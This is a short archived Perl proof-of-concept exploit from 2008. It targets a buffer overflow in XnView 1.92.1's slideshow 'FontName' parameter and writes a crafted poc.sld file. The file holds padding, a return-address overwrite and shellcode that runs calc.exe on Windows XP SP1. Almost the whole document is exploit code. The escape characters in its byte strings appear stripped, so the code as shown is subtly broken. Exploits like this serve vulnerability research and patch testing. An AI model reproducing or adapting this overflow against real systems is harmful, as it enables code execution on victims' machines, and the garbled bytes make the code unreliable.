xnview1921-overflow.txt
Posted on 03 April 2008
#!/usr/bin/perl # ================================================================ # XnView 1.92.1 Slideshow "FontName" Buffer Overflow # ================================================================ # # Calc execution POC Exploit for WinXP SP1 pro English # # Found by : Stefan Cornelius, Secunia Research # Advisory : http://secunia.com/secunia_research/2008-6/advisory # # Exploit by : haluznik | haluznik<at>gmail.com # # 04.01.2008 ..April Fools Day ;) # ================================================================ print " [*] XnView 1.92.1 Slideshow exploit by haluznik "; my $head= "x23x20x53x6cx69x64x65x20x53x68". "x6fx77x20x53x65x71x75x65x6ex63". "x65x0dx0ax46x6fx6ex74x4ex61x6d". "x65x20x3dx20x22"; $fontname = "A" x 32 . "xccx59xfbx77"; my $shellcode= "x33xc0x50x68x63x61x6cx63x54x5b". "x50x53xb9x44x80xc2x77xffxd1x50". "xbbxfdx98xe7x77xffxd3"; my $tail= "x22x0dx0ax22x43x3ax5cx74x65x73". "x74x2ex6ax70x67x22x0dx0a"; $sld = $head . $fontname . $shellcode . $tail; print " [+] Creating poc.sld file.. "; open(file,">poc.sld") || die " [-] cannot write file "; print(file $sld); close(file); print " [*] Done! ";
